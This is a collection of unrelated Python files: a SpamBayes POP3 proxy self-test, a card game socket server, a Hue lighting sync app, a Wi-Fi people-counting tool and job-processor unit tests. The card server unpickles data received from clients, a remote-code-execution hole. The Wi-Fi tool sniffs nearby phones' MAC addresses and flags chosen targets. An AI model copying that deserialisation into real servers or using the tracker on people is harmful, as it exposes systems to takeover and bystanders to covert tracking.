size = len(self.maildrop[messageIndex])
returnLines.append("%d %d" % (messageIndex + 1, size))
returnLines.append(".")
return '\r\n'.join(returnLines) + '\r\n'
def _getMessage(self, number, maxLines):
"""Implements the POP3 RETR and TOP commands."""
if 0 < number <= len(self.maildrop):
message = self.maildrop[number-1]
try:
headers, body = message.split('\n\n', 1)
except ValueError:
return "+OK %d octets\r\n%s\r\n.\r\n" % (len(message),
message)
bodyLines = body.split('\n')[:maxLines]
message = headers + '\r\n\r\n' + '\n'.join(bodyLines)
return "+OK\r\n%s\r\n.\r\n" % message
else:
return "-ERR no such message\r\n"
def onRetr(self, command, args):
"""POP3 RETR command."""
try:
number = int(args)
except ValueError:
number = -1
return self._getMessage(number, 12345)
def onTop(self, command, args):
"""POP3 RETR command."""
try:
number, lines = map(int, args.split())
except ValueError:
number, lines = -1, -1
return self._getMessage(number, lines)
def onUnknown(self, command, args):
"""Unknown POP3 command."""
return "-ERR Unknown command: %s\r\n" % repr(command)
def helper():
"""Runs a self-test using TestPOP3Server, a minimal POP3 server
that serves the example emails above.
"""
# Run a proxy and a test server in separate threads with separate
# asyncore environments.
import threading
state.isTest = True
testServerReady = threading.Event()
def runTestServer():
testSocketMap = {}
Listener(socketMap=testSocketMap)
testServerReady.set()
asyncore.loop(map=testSocketMap)
proxyReady = threading.Event()
def runUIAndProxy():
httpServer = UserInterfaceServer(8881)
proxyUI = ProxyUserInterface(state, _recreateState)
httpServer.register(proxyUI)
BayesProxyListener('localhost', 8110, ('', 8111))
state.bayes.learn(tokenizer.tokenize(spam1), True)
state.bayes.learn(tokenizer.tokenize(good1), False)
proxyReady.set()
Dibbler.run()
testServerThread = threading.Thread(target=runTestServer)
testServerThread.setDaemon(True)
testServerThread.start()
testServerReady.wait()
proxyThread = threading.Thread(target=runUIAndProxy)
proxyThread.setDaemon(True)
proxyThread.start()
proxyReady.wait()
# Connect to the proxy and the test server.
proxy = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
proxy.connect(('localhost', 8111))
response = proxy.recv(100)
assert response == "+OK ready\r\n"
pop3Server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pop3Server.connect(('localhost', 8110))
response = pop3Server.recv(100)
assert response == "+OK ready\r\n"
# Verify that the test server claims to support pipelining.
pop3Server.send("capa\r\n")
response = pop3Server.recv(1000)
assert response.find("PIPELINING") >= 0
# Ask for the capabilities via the proxy, and verify that the proxy
# is filtering out the PIPELINING capability.
proxy.send("capa\r\n")
response = proxy.recv(1000)
assert response.find("PIPELINING") == -1
# Verify that the test server claims to support STLS.
pop3Server.send("capa\r\n")
response = pop3Server.recv(1000)
assert response.find("STLS") >= 0
# Ask for the capabilities via the proxy, and verify that the proxy
# is filtering out the STLS capability.
proxy.send("capa\r\n")
response = proxy.recv(1000)
assert response.find("STLS") == -1
# Stat the mailbox to get the number of messages.
proxy.send("stat\r\n")
response = proxy.recv(100)
count, totalSize = map(int, response.split()[1:3])
assert count == 3
# Loop through the messages ensuring that they have judgement
# headers.
for i in range(1, count+1):
response = ""
proxy.send("retr %d\r\n" % i)
while response.find('\n.\r\n') == -1:
response = response + proxy.recv(1000)
assert response.find(options["Headers", "classification_header_name"]) >= 0
# Check that the proxy times out when it should. The consequence here
# is that the first packet we receive from the proxy will contain a
# partial message, so we assert for that. At 100 characters per second
# with a 1-second timeout, the message needs to be significantly longer
# than 100 characters to ensure that the timeout fires, so we make sure
# we use a message that's at least 200 characters long.
assert len(spam1) >= 2 * (1/PER_CHAR_DELAY)
options["pop3proxy", "retrieval_timeout"] = 1
options["Headers", "include_evidence"] = False
proxy.send("slow\r\n")
response = proxy.recv(100)
assert response.find("OK") != -1
proxy.send("retr 1\r\n")
response = proxy.recv(1000)
assert len(response) < len(spam1)
# Smoke-test the HTML UI.
httpServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
httpServer.connect(('localhost', 8881))
httpServer.sendall("get / HTTP/1.0\r\n\r\n")
response = ''
while 1:
packet = httpServer.recv(1000)
if not packet: break
response += packet
assert re.search(r"(?s)<html>.*SpamBayes proxy.*</html>", response)
# Kill the proxy and the test server.
proxy.sendall("kill\r\n")
proxy.recv(100)
pop3Server.sendall("kill\r\n")
pop3Server.recv(100)
def test_run():
# Read the arguments.
try:
opts, args = getopt.getopt(sys.argv[1:], 'ht')
except getopt.error, msg:
print >>sys.stderr, str(msg) + '\n\n' + __doc__
sys.exit()
state.isTest = True
runSelfTest = True
for opt, arg in opts:
if opt == '-h':
print >>sys.stderr, __doc__
sys.exit()
elif opt == '-t':
state.isTest = True
state.runTestServer = True
runSelfTest = False
state.createWorkers()
if runSelfTest:
print "\nRunning self-test...\n"
state.buildServerStrings()
helper()
print "Self-test passed." # ...else it would have asserted.
elif state.runTestServer:
print "Running a test POP3 server on port 8110..."
Listener()
asyncore.loop()
if __name__ == '__main__':
test_run()
|
networkServer.py
|
import socket
import threading
import math
import random
import pickle
import time
# Note: watch out for reference (aliasing) issues
# palyers_cards = [[],[],[]]
# def login():
def deal(palyers_cards):
colors = ("黑桃", "草花", "红桃", "方片", "王牌")
points = ("3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "A", "2", "小王", "大王")
#洗牌函数,可以用取一次random,将其从序列里删去,再重新去取
card_indexs = [x for x in range(54)]
random.shuffle(card_indexs) #是直接作用,不是返回
deal_index = random.randint(0,2)
for index in card_indexs:
palyers_cards[deal_index].append(index)
deal_index+=1
deal_index = deal_index%3
# pickle.dumps() serializes data to bytes
# pickle.loads() restores the original data
def broadcast(players,give_index):
# After the clients connect, the server runs faster than they do, so two
# consecutive sends could be received as a single message; hence the
# time.sleep below
while True:
time.sleep(0.1)
give_index[0] +=1
give_index[0] = give_index[0]%3
for i in range(len(players)):
players[i].send(pickle.dumps([i,give_index[0]]))
user_give_cards = pickle.loads(players[give_index[0]].recv(1024))
for i in range(len(players)):
players[i].send(pickle.dumps(user_give_cards))
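# Sketch of what a client is expected to do with each broadcast round (client
# code is not included in this file; the names below are illustrative):
#
#     my_index, turn_index = pickle.loads(sock.recv(1024))
#     if my_index == turn_index:
#         sock.send(pickle.dumps(cards_to_play))     # this player's move
#     played_cards = pickle.loads(sock.recv(1024))   # the move, rebroadcast to all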
def dunch_offical(players):
palyers_cards = [[],[],[]]
deal(palyers_cards)
for i in range(len(players)):
players[i].send(pickle.dumps(palyers_cards[i]))
give_index = [random.randint(0,2)]
broadcast(players,give_index)
data = pickle.loads(players[0].recv(1024))
print(data)
def main():
# Accept user logins; remember to record each user's login info (score system)
tables = []
server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server_socket.bind(('',8888))
# The school server address could be bound here to serve the WAN, i.e. this server program can be deployed on the school server
server_socket.listen(128)
print("服务器开始工作")
population_on_a_table = 0
table_number = 0
while True:
client_socket, client_addr = server_socket.accept()
print("接受到一个用户登陆")
population_on_a_table += 1
population_on_a_table = population_on_a_table%3
if population_on_a_table==1:
table_number +=1
tables.append([client_socket])
elif population_on_a_table==0:
tables[table_number-1].append(client_socket)
t = threading.Thread(target=dunch_offical,args=(tables[table_number-1],))
t.start()
print("{}号桌已经开桌".format(str(table_number)))
else:
tables[table_number-1].append(client_socket)
# Deal the cards, keeping three aside for the landlord. Dealing is handled in
# dunch_offical once the table is full, and palyers_cards is not defined in
# this scope, so the original calls below stay disabled:
# deal()
# client_socket.send(pickle.dumps(palyers_cards[1]))
# Randomly pick who bids for landlord and run one round of bidding
# Starting from the landlord, play cards, validate each play, and broadcast it (a timer could be added)
# The next player plays a hand and the hands are compared
# When the turn comes back around, note whether it is because this player's hand was highest or because the other two players both passed
# Check whether the game is over and update the scores
if __name__ == "__main__":
main()
|
HueSync.pyw
|
from tkinter import messagebox
from threading import Thread
import cv2.cv2 as cv2
import numpy as np
import pyautogui
import requests
import tkinter
import pygubu
import atexit
import rgbxy
import json
import time
import os
class LinkButtonNotPressed(Exception):
pass
def get_bridge_ip(number=0):
return requests.get("https://discovery.meethue.com/").json()[number]["internalipaddress"]
cfile = "testconfig.json" if os.path.isfile("testconfig.json") else "config.json"
VERSION = 3.3
CONFIG = json.loads(open(cfile, "r").read())
if CONFIG["adress"].lower() == "auto":
adress = get_bridge_ip(CONFIG["bridge_number"])
else:
adress = CONFIG["adress"]
if CONFIG["user"].lower() == "create":
r = requests.post(f"http://{adress}/api/", json={"devicetype": "huesync"})
if 199 < r.status_code < 300:
j = r.json()[0]
try:
if j["error"]["type"] == 101:
raise LinkButtonNotPressed("Please press the big link button on your bridge 30s before you run this "
+ "script!")
except (KeyError, IndexError):
try:
u = j["success"]["username"]
CONFIG["user"] = u
open(cfile, "w").write(json.dumps(CONFIG))
print(f"Successfully created a user! [{u}]")
except (KeyError, IndexError):
print("Please try again! [User Creation Exception]")
exit()
username = CONFIG["user"]
baseURL = f"http://{adress}/api/{username}/"
lURL = f"{baseURL}lights/"
blackvalue = CONFIG["blackval"]
sync_lamps = [x for x in CONFIG["lamps"] if len(x) > 0]
def add_lamps_in_room(room: str):
if len(room) > 0:
for lamp in requests.get(f"{baseURL}groups/{room}/").json()["lights"]:
sync_lamps.append(lamp)
for group in CONFIG["groups"]:
add_lamps_in_room(group)
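# For reference, a config.json shaped like the keys this script reads (the
# values below are placeholders, not project defaults):
#
#     {
#         "adress": "auto",
#         "bridge_number": 0,
#         "user": "create",
#         "blackval": 10,
#         "maxbri": 254,
#         "transitiontime": 1,
#         "updatespermillisecond": 1000,
#         "lamps": ["1", "2"],
#         "groups": []
#     }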
def set_all_xyb(x, y, bri, transtime=0) -> list[requests.models.Response]:
res: list[requests.models.Response] = []
for lamp in sync_lamps:
res.append(set_xyb(lamp, x, y, bri, transtime=transtime))
return res
def set_state(lamp: str, state: bool):
return requests.put(f"{lURL}{lamp}/state", json={"on": state})
def set_all_states(state: bool):
result: list[requests.models.Response] = []
for lamp in sync_lamps:
result.append(set_state(lamp, state))
return result
def get_state_list():
res = {}
for l in sync_lamps:
state = requests.get(f"{lURL}{l}/").json()["state"]
res[l] = {
"on": state["on"],
"x": state["xy"][0],
"y": state["xy"][1],
"bri": state["bri"]
}
return res
def apply_state_list(l: dict, transtime=10):
for k in l.keys():
set_xyb(k, l[k]["x"], l[k]["y"], l[k]["bri"], transtime=transtime)
set_state(k, l[k]["on"])
def set_xyb(lamp: str, x, y, bri, transtime=0) -> requests.models.Response:
return requests.put(f"{lURL}{lamp}/state/", json={"xy": [x, y], "bri": bri, "transitiontime": transtime})
def screenshot():
return np.array(pyautogui.screenshot())[:, :, ::-1].copy()
def bgr_to_rgb(bgr) -> tuple[int, int, int]:
return bgr[2], bgr[1], bgr[0]
def get_main_color_on_screen():
sc = screenshot()
data = np.reshape(sc, (-1, 3))
data = np.float32(data)
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
compactness, labels, centers = cv2.kmeans(data, 1, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
rgb = bgr_to_rgb(centers[0].astype(np.int32))
return tuple(rgb)
def get_complementary(color):
if color.startswith("#"):
color = color[1:]
color = int(color, 16)
comp_color = 0xFFFFFF ^ color
comp_color = "#%06X" % comp_color
return comp_color
class UiApp:
oState = {}
oBgColor = "SystemButtonFace"
def __init__(self):
self.builder = builder = pygubu.Builder()
builder.add_resource_path(os.path.dirname(__file__))
builder.add_from_file(os.path.join(os.path.dirname(__file__), "ui.ui"))
self.mainwindow = builder.get_object('root')
builder.connect_callbacks(self)
def onStartButtonClick(self):
global run
self.oBgColor = self.builder.get_object("colorPreview")["bg"]
run = True
self.oState = get_state_list()
set_all_states(True)
self.builder.get_object("startButton")["state"] = "disable"
self.builder.get_object("stopButton")["state"] = "active"
def onStopButtonClick(self):
global run
run = False
apply_state_list(self.oState)
self.builder.get_object("colorPreview")["bg"] = self.oBgColor
self.builder.get_object("startButton")["state"] = "active"
self.builder.get_object("stopButton")["state"] = "disable"
def update_color(self, rgb):
global run
self.builder.get_object("colorPreview")["bg"] = self.oBgColor if not run else '#%02x%02x%02x' % rgb
def run(self):
self.mainwindow.mainloop()
def main():
while True:
while run:
try:
# Get Values
r, g, b = get_main_color_on_screen()
x, y = rgbxy.Converter().rgb_to_xy(r, g, b)
bri = min(CONFIG["maxbri"], int(abs(100 - (r + g + b))))
if r <= blackvalue and g <= blackvalue and b <= blackvalue:
r, g, b = 1, 1, 1
x, y = rgbxy.Converter().rgb_to_xy(r, g, b)
bri = 0
set_all_xyb(x, y, bri, transtime=CONFIG["transitiontime"])
app.update_color(tuple([min(255, v * 3) for v in (r, g, b)]))
time.sleep(1000 / CONFIG["updatespermillisecond"])
except BlockingIOError as ex:
print(ex)
def start_exiter():
time.sleep(5)
os._exit(0)
def on_exit():
Thread(target=start_exiter).start()
app.onStopButtonClick()
root.destroy()
def on_window_close():
Thread(target=start_exiter).start()
app.onStopButtonClick()
root.destroy()
os._exit(0)
def check_version():
try:
lrelease = requests.get("https://api.github.com/repos/timtrayler/hue-sync/releases/latest").json()
ltag = float(lrelease["tag_name"].replace("v", ""))
if ltag > VERSION:
messagebox.showinfo("New version avaible",
"A newer version of hue sync is avaible, please visit https://github.com/TimTrayler/hue-sync/releases/latest to download the newest version.")
except Exception:
print("Failed to check version!")
if __name__ == "__main__":
check_version()
run = False
Thread(target=main).start()
root = tkinter.Tk()
# Window
root.resizable(0, 0)
root.iconbitmap(r"icon.ico")
root.title("Hue Sync")
# Exit on tkinter exit
root.protocol("WM_DELETE_WINDOW", on_window_close)
atexit.register(on_exit)
app = UiApp()
app.run()
|
__main__.py
|
import threading
import sys
import os
import platform
import subprocess
import json
import time
import requests
import datetime
import netifaces
import click
from requests import ConnectionError
from analysis import analyze_file
from oui import oui
from colors import *
if os.name != 'nt':
from pick import pick
def which(program):
"""Determines whether program exists
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
raise Exception("Error in which program.")
def iftttpost(iphones, androids):
"""Posts data to an IFTTT channel to save in Google Sheets"""
# by Andy Maxwell 6/13/2018
report = {}
report["value1"] = datetime.datetime.now().strftime("%m-%d-%Y %H:%M:%S")
report["value2"] = iphones
report["value3"] = androids
# print(requests.post('https://maker.ifttt.com/trigger/xyz/with/key/khiN5Xs3nUOmx0ZGKrY8t',
# data=report).text)
def localhost_report(apple, androids, others, devicesCount, resolvedDevicesCount):
"""Posts data to localhost server."""
# By Nash Gadre (github: @allnash)
unix_time = int(time.time() * 1000)
report = {"apple_count": apple,
"android_count": androids,
"others_count": others,
"devices_count": devicesCount,
"resolved_devices_count": resolvedDevicesCount,
"reader_seen_time": unix_time}
try:
requests.post('http://localhost:8000/json/cellphone_sightings_metrics', json=report)
print("Cellphone probe request data posted")
except ConnectionError:
print("Error posting cellphone probe request data")
def localhost_report_real(json):
"""Posts Probe request data to localhost server."""
# By Nash Gadre (github: @allnash)
unix_time = int(time.time() * 1000)
report = {"cellphones": json, "reader_seen_time": unix_time}
try:
requests.post('http://localhost:8000/json/cellphone_sightings', json=report)
print("Cellphone sighting data posted")
except ConnectionError:
print("Error posting cellphone sighting data")
def showTimer(timeleft):
"""Shows a countdown timer"""
total = int(timeleft) * 10
for i in range(total):
sys.stdout.write('\r')
        # Build the progress-bar and time-remaining string
timeleft_string = '%ds left' % int((total - i + 1) / 10)
if (total - i + 1) > 600:
timeleft_string = '%dmin %ds left' % (
int((total - i + 1) / 600), int((total - i + 1) / 10 % 60))
sys.stdout.write("[%-50s] %d%% %15s" %
('=' * int(50.5 * i / total), 101 * i / total, timeleft_string))
sys.stdout.flush()
time.sleep(0.1)
print("")
def fileToMacSet(path):
with open(path, 'r') as f:
maclist = f.readlines()
return set([x.strip() for x in maclist])
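# fileToMacSet() expects a plain text file with one MAC address per line, e.g.
# (addresses below are illustrative):
#
#   aa:bb:cc:dd:ee:ff
#   11:22:33:44:55:66
#
#   targetmacset = fileToMacSet('targets.txt')  # -> {'aa:bb:cc:dd:ee:ff', ...}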
@click.command()
@click.option('-a', '--adapter', default='', help='adapter to use')
@click.option('-z', '--analyze', default='', help='analyze file')
@click.option('-s', '--scantime', default='60', help='time in seconds to scan')
@click.option('-o', '--out', default='', help='output cellphone data to file')
@click.option('-v', '--verbose', help='verbose mode', is_flag=True)
@click.option('--number', help='just print the number', is_flag=True)
@click.option('-j', '--jsonprint', help='print JSON of cellphone data', is_flag=True)
@click.option('-n', '--nearby', help='only quantify signals that are nearby (rssi > -80) and '
'distinct devices (rssi > -120)', is_flag=True)
@click.option('--allmacaddresses',
              help='count all MAC addresses instead of only those matching known cellphone manufacturers in the OUI database',
is_flag=True) # noqa
@click.option('--nocorrection', help='do not apply correction', is_flag=True)
@click.option('--loop', help='loop forever', is_flag=True)
@click.option('--port', default=8001, help='port to use when serving analysis')
@click.option('--sort', help='sort cellphone data by distance (rssi)', is_flag=True)
@click.option('--targetmacs', help='read a file that contains target MAC addresses', default='')
def main(adapter, scantime, verbose, number, nearby, jsonprint, out, allmacaddresses, nocorrection, loop, analyze, port,
sort, targetmacs):
if analyze != '':
analyze_file(analyze, port)
return
if loop:
while True:
adapter = scan(adapter, scantime, verbose, number,
nearby, jsonprint, out, allmacaddresses, nocorrection, loop, sort, targetmacs)
else:
scan(adapter, scantime, verbose, number,
nearby, jsonprint, out, allmacaddresses, nocorrection, loop, sort, targetmacs)
def scan(adapter, scantime, verbose, number, nearby, jsonprint, out, allmacaddresses, nocorrection, loop, sort,
targetmacs):
"""Monitor wifi signals to count the number of people around you"""
# print("OS: " + os.name)
# print("Platform: " + platform.system())
try:
tshark = which("tshark")
except:
if platform.system() != 'Darwin':
print('tshark not found, install using\n\napt-get install tshark\n')
else:
print('wireshark not found, install using: \n\tbrew install wireshark')
print(
'you may also need to execute: \n\tbrew cask install wireshark-chmodbpf')
return
if jsonprint:
number = True
if number:
verbose = False
if len(adapter) == 0:
if os.name == 'nt':
print('You must specify the adapter with -a ADAPTER')
print('Choose from the following: ' +
', '.join(netifaces.interfaces()))
return
title = 'Please choose the adapter you want to use: '
adapter, index = pick(netifaces.interfaces(), title)
# print("Using %s adapter and scanning for %s seconds..." %
# (adapter, scantime))
if not number:
# Start timer
t1 = threading.Thread(target=showTimer, args=(scantime,))
t1.daemon = True
t1.start()
# Scan with tshark
command = [tshark, '-I', '-i', adapter, '-a',
'duration:' + scantime, '-w', '/tmp/tshark-temp']
if verbose:
print(' '.join(command))
run_tshark = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, nothing = run_tshark.communicate()
if not number:
t1.join()
# Read tshark output for chatter coming from cellphones.
full_spectrum_command = [
tshark, '-r',
'/tmp/tshark-temp',
'-T',
'fields', '-e',
'wlan.sa', '-e',
'wlan.bssid', '-e',
'radiotap.dbm_antsignal'
]
# Read tshark output for probe requests.
probe_spectrum_command = [
tshark, '-r',
'/tmp/tshark-temp',
'-Y', 'wlan.fc.type == 0 && wlan.fc.type_subtype == 4',
'-T',
'fields', '-e',
'wlan.sa', '-e',
'wlan.bssid', '-e',
'radiotap.dbm_antsignal'
]
# Read tshark output for QoS data Null frames.
device_resolution_command = [
tshark, '-r',
'/tmp/tshark-temp',
# '-Y', 'wlan.fc.type_subtype == 0x0000 || wlan.fc.type_subtype == 0x000A',
'-Y',
'wlan.fc.type_subtype == 44 || wlan.fc.type_subtype == 36',
'-T',
'fields', '-e',
'wlan.sa', '-e',
'wlan.da', '-e',
'radiotap.dbm_antsignal'
]
run_tshark_full_spectrum = subprocess.Popen(
full_spectrum_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    output_full_spectrum, nothing = run_tshark_full_spectrum.communicate()
run_tshark_probe = subprocess.Popen(
probe_spectrum_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output_probe, nothing = run_tshark_probe.communicate()
run_tshark_device_resolution = subprocess.Popen(
device_resolution_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output_resolution, nothing = run_tshark_device_resolution.communicate()
# read target MAC address
targetmacset = set()
if targetmacs != '':
targetmacset = fileToMacSet(targetmacs)
foundFullSpectrumMacs = {}
foundProbeMacs = {}
foundRealDeviceMacs = {}
    for line in output_full_spectrum.decode('utf-8').split('\n'):
if verbose:
print(line)
if line.strip() == '':
continue
mac = line.split()[0].strip().split(',')[0]
dats = line.split()
if len(dats) == 3:
if ':' not in dats[0] or len(dats) != 3:
continue
if mac not in foundFullSpectrumMacs:
foundFullSpectrumMacs[mac] = []
dats_2_split = dats[2].split(',')
if len(dats_2_split) > 1:
rssi = float(dats_2_split[0]) / 2 + float(dats_2_split[1]) / 2
else:
rssi = float(dats_2_split[0])
foundFullSpectrumMacs[mac].append(rssi)
for line in output_probe.decode('utf-8').split('\n'):
if verbose:
print(line)
if line.strip() == '':
continue
mac = line.split()[0].strip().split(',')[0]
dats = line.split()
if len(dats) == 3:
if ':' not in dats[0] or len(dats) != 3:
continue
if mac not in foundProbeMacs:
foundProbeMacs[mac] = []
dats_2_split = dats[2].split(',')
if len(dats_2_split) > 1:
rssi = float(dats_2_split[0]) / 2 + float(dats_2_split[1]) / 2
else:
rssi = float(dats_2_split[0])
foundProbeMacs[mac].append(rssi)
for line in output_resolution.decode('utf-8').split('\n'):
if verbose:
print(line)
if line.strip() == '':
continue
mac = line.split()[0].strip().split(',')[0]
dats = line.split("\t")
if len(dats) == 3 and len(dats[1]) > 0:
if ':' not in dats[0] or len(dats) != 3:
continue
if mac not in foundRealDeviceMacs:
foundRealDeviceMacs[mac] = []
dats_2_split = dats[2].split(',')
if len(dats_2_split) > 1:
rssi = float(dats_2_split[0]) / 2 + float(dats_2_split[1]) / 2
else:
try:
rssi = float(dats_2_split[0])
except ValueError:
rssi = 0
foundRealDeviceMacs[mac].append(rssi)
if not foundFullSpectrumMacs:
print("Found no macs, check the 'tshark' command and make sure Wifi card: %s supports monitor mode." % adapter)
return
if not foundRealDeviceMacs:
print("No real macs were found. Ignoring.")
for key, value in foundFullSpectrumMacs.items():
foundFullSpectrumMacs[key] = float(sum(value)) / float(len(value))
for key, value in foundRealDeviceMacs.items():
foundRealDeviceMacs[key] = float(sum(value)) / float(len(value))
for key, value in foundProbeMacs.items():
foundProbeMacs[key] = float(sum(value)) / float(len(value))
# Find target MAC address in foundMacs
if targetmacset:
sys.stdout.write(RED)
for mac in foundFullSpectrumMacs:
if mac in targetmacset:
print("Found MAC address: %s" % mac)
print("rssi: %s" % str(foundFullSpectrumMacs[mac]))
sys.stdout.write(RESET)
cellphone = [
'Motorola Mobility LLC, a Lenovo Company',
'GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD',
'Huawei Symantec Technologies Co.,Ltd.',
'Microsoft',
'HTC Corporation',
'Samsung Electronics Co.,Ltd',
'SAMSUNG ELECTRO-MECHANICS(THAILAND)',
'BlackBerry RTS',
'LG ELECTRONICS INC',
'Murata Manufacturing Co., Ltd.',
'Nokia Corporation',
'Apple, Inc.',
'BLU Products Inc.',
'vivo Mobile Communication Co., Ltd.',
'Alcatel-Lucent Shanghai Bell Co., Ltd',
'BlackBerry RTS',
'LG Electronics',
'OnePlus Tech (Shenzhen) Ltd',
'OnePlus Technology (Shenzhen) Co., Ltd',
'LG Electronics (Mobile Communications)',
'OnePlus Tech (Shenzhen) Ltd',
'Xiaomi Communications Co Ltd',
'LG Electronics (Mobile Communications)',
'Google, Inc.',
'zte corporation',
'Sony Corporation',
'Sony Mobile Communications AB',
'GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD',
'Gionee Communication Equipment Co.,Ltd.',
        'Lenovo Mobile Communication Technology Ltd.',
        'Xiaomi Communications Co Ltd',
        'HUAWEI TECHNOLOGIES CO.,LTD']
cellphone_people = []
cellphone_macs = []
cellphone_probe_macs = []
androids = 0
iphones = 0
others = 0
for mac in foundFullSpectrumMacs:
oui_id = 'Not in OUI'
if mac[:8] in oui:
oui_id = oui[mac[:8]]
if verbose:
print(mac, oui_id, oui_id in cellphone)
if allmacaddresses or oui_id in cellphone:
            if not nearby or (nearby and foundFullSpectrumMacs[mac] > -80):
cellphone_people.append(
{'company': oui_id, 'rssi': foundFullSpectrumMacs[mac], 'mac': mac})
if oui_id == 'Apple, Inc.':
iphones += 1
elif oui_id in cellphone:
androids += 1
elif oui_id != 'Not in OUI':
others += 1
else:
""
for mac in foundProbeMacs:
oui_id = 'Not in OUI'
if mac[:8] in oui:
oui_id = oui[mac[:8]]
if verbose:
print(mac, oui_id, oui_id in cellphone)
if not nearby or (nearby and foundProbeMacs[mac] > -80):
cellphone_probe_macs.append(
{'company': oui_id, 'rssi': foundProbeMacs[mac], 'mac': mac})
for mac in foundRealDeviceMacs:
oui_id = 'Not in OUI'
if mac[:8] in oui:
oui_id = oui[mac[:8]]
if verbose:
print(mac, oui_id, oui_id in cellphone)
if not nearby or (nearby and foundRealDeviceMacs[mac] > -120):
cellphone_macs.append(
{'company': oui_id, 'rssi': foundRealDeviceMacs[mac], 'mac': mac})
if sort:
cellphone_people.sort(key=lambda x: x['rssi'], reverse=True)
if verbose:
print(json.dumps(cellphone_people, indent=2))
# US / Canada: https://twitter.com/conradhackett/status/701798230619590656
percentage_of_people_with_phones = 0.7
if nocorrection:
percentage_of_people_with_phones = 1
num_devices = int(round(len(cellphone_probe_macs) / percentage_of_people_with_phones))
num_resolved_devices = int(round(len(cellphone_macs)))
if number and not jsonprint:
print("Total: {}".format(num_devices))
print("iPhones: {} Androids: {}".format(iphones, androids))
# print(cellphone_people)
# adding IFTTT post
# iftttpost(iphones, androids)
elif jsonprint:
# print(json.dumps(cellphone_people, indent=2))
localhost_report(iphones, androids, others, num_devices, num_resolved_devices)
localhost_report_real(cellphone_macs)
else:
if num_devices == 0:
print("No one around (not even you!).")
elif num_devices == 1:
print("No one around, but you.")
else:
print("There are about %d people around." % num_devices)
if out:
with open(out, 'a') as f:
data_dump = {'cellphones': cellphone_people, 'time': time.time()}
f.write(json.dumps(data_dump) + "\n")
if verbose:
print("Wrote %d records to %s" % (len(cellphone_people), out))
os.remove('/tmp/tshark-temp')
return adapter
if __name__ == '__main__':
main()
# oui = {}
# with open('data/oui.txt','r') as f:
# for line in f:
# if '(hex)' in line:
# data = line.split('(hex)')
# key = data[0].replace('-',':').strip()
# company = data[1].strip()
# oui[key] = company
# with open('oui.json','w') as f:
# f.write(json.dumps(oui,indent=2))
|
test_processor.py
|
import mock
import os
import shutil
import tempfile
from threading import Thread
import time
import unittest
from vixen.processor import Processor, Job, CommandFactory, \
PythonFunctionFactory, TaggerFactory, dump, load
from vixen.tests.test_directory import make_data
from vixen.project import Project, TagInfo
class TestJob(unittest.TestCase):
def test_simple_job(self):
# Given
func = mock.Mock(return_value='hello')
args = [1, 2]
kw = {'a': 10, 'b': 20}
j = Job(func=func, args=args, kw=kw)
self.assertEqual(j.status, 'none')
self.assertEqual(j.result, None)
# When
j.run()
j.thread.join()
# Then
self.assertEqual(j.status, 'success')
func.assert_called_once_with(*args, **kw)
self.assertEqual(j.result, 'hello')
self.assertEqual(j.error, '')
def test_job_captures_errors(self):
def bomb():
assert 1 == 2
# Given
j = Job(func=bomb)
# When
j.run()
j.thread.join()
# Then
self.assertEqual(j.status, 'error')
self.assertIn('AssertionError', j.error)
self.assertIn('assert 1 == 2', j.error)
self.assertTrue(len(j.error) > 1, "Got: %s" % j.error)
class TestProcessor(unittest.TestCase):
def test_processor_completes_jobs(self):
# Given
jobs = [Job(func=mock.Mock(return_value=x), args=[x])
for x in range(10)]
p = Processor(jobs=jobs)
self.assertEqual(p.status, 'none')
# When
p.process()
# Then
self.assertEqual(p.status, 'success')
self.assertEqual(len(p.completed), 10)
for i, j in enumerate(jobs):
self.assertEqual(j.status, 'success')
j.func.assert_called_once_with(i)
self.assertEqual(j.result, i)
def test_processor_pauses_correctly(self):
# Given
def _sleep(x):
time.sleep(0.01)
return x
jobs = [Job(func=mock.Mock(side_effect=_sleep), args=[x])
for x in range(10)]
p = Processor(jobs=jobs)
self.addCleanup(p.stop)
self.assertEqual(p.status, 'none')
# When
t = Thread(target=p.process)
t.start()
# Sleep for a tiny bit and pause
time.sleep(0.05)
p.pause()
time.sleep(0.01)
# Then
self.assertEqual(p.status, 'running')
self.assertTrue(len(p.completed) < 10)
# When
p.resume()
count = 0
while p.status == 'running' and count < 10:
time.sleep(0.5)
count += 1
self.assertEqual(len(p.completed), 10)
self.assertEqual(len(p.running), 0)
for i, j in enumerate(jobs):
self.assertEqual(j.status, 'success')
j.func.assert_called_once_with(i)
self.assertEqual(j.result, i)
def test_processor_stops_correctly(self):
# Given
def _sleep(x):
time.sleep(0.01)
return x
jobs = [Job(func=mock.Mock(side_effect=_sleep), args=[x])
for x in range(5)]
p = Processor(jobs=jobs)
self.addCleanup(p.stop)
self.assertEqual(p.status, 'none')
# When
t = Thread(target=p.process)
t.start()
# Sleep for a tiny bit and pause
time.sleep(0.05)
p.stop()
count = 0
while p.status == 'running' and count < 10:
time.sleep(0.05)
count += 1
# Then
self.assertEqual(p.status, 'success')
self.assertTrue(len(p.completed) < 5)
self.assertEqual(len(p.running), 0)
for i, j in enumerate(p.completed):
self.assertEqual(j.status, 'success')
j.func.assert_called_once_with(i)
self.assertEqual(j.result, i)
def test_processor_bails_on_error(self):
# Given
f = mock.Mock()
def bomb():
f()
assert 1 == 2
jobs = [Job(func=bomb)]
jobs.extend(
Job(func=mock.Mock(return_value=x), args=[x]) for x in range(10)
)
p = Processor(jobs=jobs)
# When
p.process()
# Then
self.assertEqual(p.status, 'error')
